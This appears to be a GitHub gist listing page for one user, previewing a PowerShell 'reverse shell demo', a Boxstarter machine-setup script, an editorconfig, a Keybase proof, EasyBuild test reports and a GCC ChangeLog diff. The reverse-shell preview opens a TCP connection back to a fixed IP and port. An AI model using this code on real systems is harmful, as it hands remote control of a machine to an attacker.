Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@froland
froland / reverse_shell.ps1
Created November 30, 2023 13:26
Reverse shell demo
$socket = new-object System.Net.Sockets.TcpClient('192.168.129.29', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
# Description: Boxstarter script
# Author: François ROLAND
# Script to setup a freshly installed machine
Disable-UAC
Disable-BingSearch
Disable-GameBarTips
Set-WindowsExplorerOptions -EnableShowHiddenFilesFoldersDrives -DisableShowProtectedOSFiles -EnableShowFileExtensions -EnableShowFullPathInTitleBar -EnableOpenFileExplorerToQuickAccess -EnableShowRecentFilesInQuickAccess -EnableShowFrequentFoldersInQuickAccess -EnableExpandToOpenFolder -DisableShowRibbon
Set-BoxstarterTaskbarOptions -Combine Always
@froland
froland / .editorconfig
Created September 12, 2018 13:16
Editorconfig
root = true
[*]
end_of_line = lf
insert_final_newline = true
charset = utf-8
indent_style = space
indent_size = 2

Keybase proof

I hereby claim:

  • I am froland on github.
  • I am froland (https://keybase.io/froland) on keybase.
  • I have a public key ASDFhMxs2WA0wgagk1Dbx_Hqwli9ksD8JPrKJma3_S6Ykwo

To claim this, I am signing this object:

@froland
froland / easybuild_test_report_easyconfigs_pr5828_20184714-UTC-16-47-51.md
Created February 14, 2018 16:47
EasyBuild test report for easyconfigs PR #5828

Test report for easybuilders/easybuild-easyconfigs#5828

Test result

Build succeeded for 1 out of 1 (1 easyconfigs in this PR)

Overview of tested easyconfigs (in order)

  • SUCCESS Gradle-4.5.1.eb

Time info

  • start: Wed, 14 Feb 2018 16:47:43 +0000 (UTC)
@froland
froland / easybuild_test_report_easyconfigs_pr5775_20185305-UTC-15-53-35.md
Created February 5, 2018 15:53
EasyBuild test report for easyconfigs PR #5775

Test report for easybuilders/easybuild-easyconfigs#5775

Test result

Build succeeded for 1 out of 1 (1 easyconfigs in this PR)

Overview of tested easyconfigs (in order)

  • SUCCESS CUDA-9.1.85-GCC-6.4.0-2.28.eb

Time info

  • start: Mon, 05 Feb 2018 15:51:29 +0000 (UTC)
--- branches/gcc-6-branch/libsanitizer/ChangeLog 2017/09/07 03:07:42 251827
+++ branches/gcc-6-branch/libsanitizer/ChangeLog 2017/09/07 07:15:24 251828
@@ -1,3 +1,14 @@
+2017-09-07 Matthias Klose <doko@ubuntu.com>
+
+ Backported from mainline
+ 2017-07-14 Jakub Jelinek <jakub@redhat.com>
+
+ PR sanitizer/81066
+ * sanitizer_common/sanitizer_linux.h: Cherry-pick upstream r307969.
@froland
froland / test.txt
Created January 23, 2018 20:05
test123
This is just a test
@froland
froland / test.txt
Created January 23, 2018 20:01
test123
This is just a test
@froland
froland / test.txt
Created January 23, 2018 19:59
test123
This is just a test